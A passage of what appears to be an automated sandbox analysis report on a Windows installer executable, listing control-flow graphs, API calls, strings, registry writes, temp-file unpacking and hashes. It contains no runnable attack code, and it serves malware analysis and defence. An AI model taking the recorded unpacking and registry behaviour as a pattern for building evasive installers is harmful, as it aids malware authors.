                                                                                                      • Part of subcall function 004059E3: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403425,?), ref: 00405A09
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Fa24c148.exe,C:\Users\user\Desktop\Fa24c148.exe,80000000,00000003,?,?,?,00000000,00403425,?), ref: 00402DE2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                    • String ID: "C:\Users\user\Desktop\Fa24c148.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Fa24c148.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$P~A$soft
                                                                                                    • API String ID: 4283519449-3654684238
                                                                                                    • Opcode ID: deaa8614282d3ada7b3d30178f8022547566b7f059afc153b6d9a88955226618
                                                                                                    • Instruction ID: 9a0bc50dc50940ee2abb7c3ced767a556554b68a68c4a60a299fb88064fb1f26
                                                                                                    • Opcode Fuzzy Hash: deaa8614282d3ada7b3d30178f8022547566b7f059afc153b6d9a88955226618
                                                                                                    • Instruction Fuzzy Hash: 88512871900205ABDB209F65DE89BAF7BB8EB14358F10403BF904B62D1C7B88D418BAD

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 534 401752-401777 call 402b3a call 405839 539 401781-401793 call 405d77 call 4057c2 lstrcatW 534->539 540 401779-40177f call 405d77 534->540 545 401798-401799 call 40600b 539->545 540->545 549 40179e-4017a2 545->549 550 4017a4-4017ae call 4060ba 549->550 551 4017d5-4017d8 549->551 559 4017c0-4017d2 550->559 560 4017b0-4017be CompareFileTime 550->560 552 4017e0-4017fc call 4059e3 551->552 553 4017da-4017db call 4059be 551->553 561 401870-401899 call 405021 call 402fa2 552->561 562 4017fe-401801 552->562 553->552 559->551 560->559 576 4018a1-4018ad SetFileTime 561->576 577 40189b-40189f 561->577 563 401852-40185c call 405021 562->563 564 401803-401841 call 405d77 * 2 call 405d99 call 405d77 call 405553 562->564 574 401865-40186b 563->574 564->549 597 401847-401848 564->597 579 4029d0 574->579 578 4018b3-4018be CloseHandle 576->578 577->576 577->578 581 4018c4-4018c7 578->581 582 4029c7-4029ca 578->582 583 4029d2-4029d6 579->583 585 4018c9-4018da call 405d99 lstrcatW 581->585 586 4018dc-4018df call 405d99 581->586 582->579 593 4018e4-402243 call 405553 585->593 586->593 593->583 597->574 599 40184a-40184b 597->599 599->563
                                                                                                    APIs
                                                                                                    • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Program Files (x86)\shaw,?,?,00000031), ref: 00401793
                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Program Files (x86)\shaw,?,?,00000031), ref: 004017B8
                                                                                                      • Part of subcall function 00405D77: lstrcpynW.KERNEL32(?,?,00000400,0040326D,004281A0,NSIS Error), ref: 00405D84
                                                                                                      • Part of subcall function 00405021: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dll,00000000,0040FE48,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000,?), ref: 00405059
                                                                                                      • Part of subcall function 00405021: lstrlenW.KERNEL32(004030DB,Skipped: C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dll,00000000,0040FE48,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000), ref: 00405069
                                                                                                      • Part of subcall function 00405021: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dll,004030DB,004030DB,Skipped: C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dll,00000000,0040FE48,00000000), ref: 0040507C
                                                                                                      • Part of subcall function 00405021: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dll), ref: 0040508E
                                                                                                      • Part of subcall function 00405021: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004050B4
                                                                                                      • Part of subcall function 00405021: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050CE
                                                                                                      • Part of subcall function 00405021: SendMessageW.USER32(?,00001013,?,00000000), ref: 004050DC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                    • String ID: C:\Program Files (x86)\shaw$C:\Users\user\AppData\Local\Temp\nslCCA0.tmp$C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dll$Call
                                                                                                    • API String ID: 1941528284-534856240
                                                                                                    • Opcode ID: 69be8e2269a1f7a821158fec15adda67e81a6c57227f726c0035925acb367b04
                                                                                                    • Instruction ID: f5340c52137ac8e05323c68babe13c17cc5cde59bf11d192bd930834dcc8acac
                                                                                                    • Opcode Fuzzy Hash: 69be8e2269a1f7a821158fec15adda67e81a6c57227f726c0035925acb367b04
                                                                                                    • Instruction Fuzzy Hash: C6419071900908BACF11BBB5CC46DAF7679EF05368F20863BF425B11E1D73C8A419A6E

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 600 405021-405036 601 40503c-40504d 600->601 602 4050ed-4050f1 600->602 603 405058-405064 lstrlenW 601->603 604 40504f-405053 call 405d99 601->604 606 405081-405085 603->606 607 405066-405076 lstrlenW 603->607 604->603 609 405094-405098 606->609 610 405087-40508e SetWindowTextW 606->610 607->602 608 405078-40507c lstrcatW 607->608 608->606 611 40509a-4050dc SendMessageW * 3 609->611 612 4050de-4050e0 609->612 610->609 611->612 612->602 613 4050e2-4050e5 612->613 613->602
                                                                                                    APIs
                                                                                                    • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dll,00000000,0040FE48,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000,?), ref: 00405059
                                                                                                    • lstrlenW.KERNEL32(004030DB,Skipped: C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dll,00000000,0040FE48,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000), ref: 00405069
                                                                                                    • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dll,004030DB,004030DB,Skipped: C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dll,00000000,0040FE48,00000000), ref: 0040507C
                                                                                                    • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dll), ref: 0040508E
                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004050B4
                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050CE
                                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 004050DC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                    • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dll
                                                                                                    • API String ID: 2531174081-4017345425
                                                                                                    • Opcode ID: be2a794c2a3455270d4b05c7547fa0c48c28aa5b6759893b99f6518c6e473265
                                                                                                    • Instruction ID: 72d3c87754a4f2576c1daf3770cdfe6bbb79a9fd4797c08dd841ae8e1e27fedc
                                                                                                    • Opcode Fuzzy Hash: be2a794c2a3455270d4b05c7547fa0c48c28aa5b6759893b99f6518c6e473265
                                                                                                    • Instruction Fuzzy Hash: AE219D71900518BBCB219F95DD84ADFBFB9EF45350F14807AF904B62A0C3798A41CFA8

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 614 402fa2-402fb9 615 402fc2-402fca 614->615 616 402fbb 614->616 617 402fd1-402fd6 615->617 618 402fcc 615->618 616->615 619 402fe6-402ff3 call 40319e 617->619 620 402fd8-402fe1 call 4031b4 617->620 618->617 624 403149 619->624 625 402ff9-402ffd 619->625 620->619 628 40314b-40314c 624->628 626 403132-403134 625->626 627 403003-403023 GetTickCount call 4061fd 625->627 629 403136-403139 626->629 630 403189-40318d 626->630 638 403194 627->638 640 403029-403031 627->640 632 403197-40319b 628->632 635 40313b 629->635 636 40313e-403147 call 40319e 629->636 633 40314e-403154 630->633 634 40318f 630->634 641 403156 633->641 642 403159-403167 call 40319e 633->642 634->638 635->636 636->624 647 403191 636->647 638->632 644 403033 640->644 645 403036-403044 call 40319e 640->645 641->642 642->624 650 403169-40317c WriteFile 642->650 644->645 645->624 654 40304a-403053 645->654 647->638 652 40312e-403130 650->652 653 40317e-403181 650->653 652->628 653->652 655 403183-403186 653->655 656 403059-403076 call 40621d 654->656 655->630 659 40312a-40312c 656->659 660 40307c-403093 GetTickCount 656->660 659->628 661 403095-40309d 660->661 662 4030de-4030e2 660->662 663 4030a5-4030d6 MulDiv wsprintfW call 405021 661->663 664 40309f-4030a3 661->664 665 4030e4-4030e7 662->665 666 40311f-403122 662->666 671 4030db 663->671 664->662 664->663 669 403107-40310d 665->669 670 4030e9-4030fb WriteFile 665->670 666->640 667 403128 666->667 667->638 673 403113-403117 669->673 670->652 672 4030fd-403100 670->672 671->662 672->652 674 403102-403105 672->674 673->656 675 40311d 673->675 674->673 675->638
                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32 ref: 00403003
                                                                                                    • GetTickCount.KERNEL32 ref: 00403084
                                                                                                    • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004030B1
                                                                                                    • wsprintfW.USER32 ref: 004030C4
                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,0040FE48,7FFFFFFF,00000000), ref: 004030F3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CountTick$FileWritewsprintf
                                                                                                    • String ID: ... %d%%
                                                                                                    • API String ID: 4209647438-2449383134
                                                                                                    • Opcode ID: 13d77005233b2c703e88a738dcd56f5575194dca18d803a30cab386bf45fddca
                                                                                                    • Instruction ID: 2f3b8c8ab01821edfbb7561a0937ed23110cd7788458c70898d592dcb6d42ddc
                                                                                                    • Opcode Fuzzy Hash: 13d77005233b2c703e88a738dcd56f5575194dca18d803a30cab386bf45fddca
                                                                                                    • Instruction Fuzzy Hash: 8A516D31900219ABCF10DF65D944AAF7BACAF48756F10413BE910BB2C0D7389E51CBA9

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 676 402331-402377 call 402c2f call 402b3a * 2 RegCreateKeyExW 683 4029c7-4029d6 676->683 684 40237d-402385 676->684 686 402387-402394 call 402b3a lstrlenW 684->686 687 402398-40239b 684->687 686->687 688 4023ab-4023ae 687->688 689 40239d-4023aa call 402b1d 687->689 693 4023b0-4023ba call 402fa2 688->693 694 4023bf-4023d3 RegSetValueExW 688->694 689->688 693->694 698 4023d5 694->698 699 4023d8-4024b2 RegCloseKey 694->699 698->699 699->683 701 402793-40279a 699->701 701->683
                                                                                                    APIs
                                                                                                    • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                                                                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nslCCA0.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                                                                    • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nslCCA0.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nslCCA0.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateValuelstrlen
                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nslCCA0.tmp
                                                                                                    • API String ID: 1356686001-1440026347
                                                                                                    • Opcode ID: 60d0e40a1802c79bda5c7497f46e73a45a695d690e5e4760ff09b179a2f47946
                                                                                                    • Instruction ID: ff9c26e96d548ba14907c7cf0d775baaea3cd420635c28ab46d49cad89ffe0f3
                                                                                                    • Opcode Fuzzy Hash: 60d0e40a1802c79bda5c7497f46e73a45a695d690e5e4760ff09b179a2f47946
                                                                                                    • Instruction Fuzzy Hash: 311181B1A00108BEEB10AFA4DD49EAF777CEB50358F10443AF905B61D0D7B85D409A29

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 702 4015b9-4015cd call 402b3a call 40586d 707 401614-401617 702->707 708 4015cf-4015eb call 4057ef CreateDirectoryW 702->708 709 401646-402197 call 401423 707->709 710 401619-401638 call 401423 call 405d77 SetCurrentDirectoryW 707->710 717 40160a-401612 708->717 718 4015ed-4015f8 GetLastError 708->718 724 402793-40279a 709->724 725 4029c7-4029d6 709->725 710->725 727 40163e-401641 710->727 717->707 717->708 721 401607 718->721 722 4015fa-401605 GetFileAttributesW 718->722 721->717 722->717 722->721 724->725 727->725
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040586D: CharNextW.USER32(?,?,C:\,?,004058E1,C:\,C:\,?,?,74DF3420,0040561F,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\Fa24c148.exe"), ref: 0040587B
                                                                                                      • Part of subcall function 0040586D: CharNextW.USER32(00000000), ref: 00405880
                                                                                                      • Part of subcall function 0040586D: CharNextW.USER32(00000000), ref: 00405898
                                                                                                    • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                                                                    • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,C:\Program Files (x86)\shaw,?,00000000,000000F0), ref: 00401630
                                                                                                    Strings
                                                                                                    • C:\Program Files (x86)\shaw, xrefs: 00401623
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
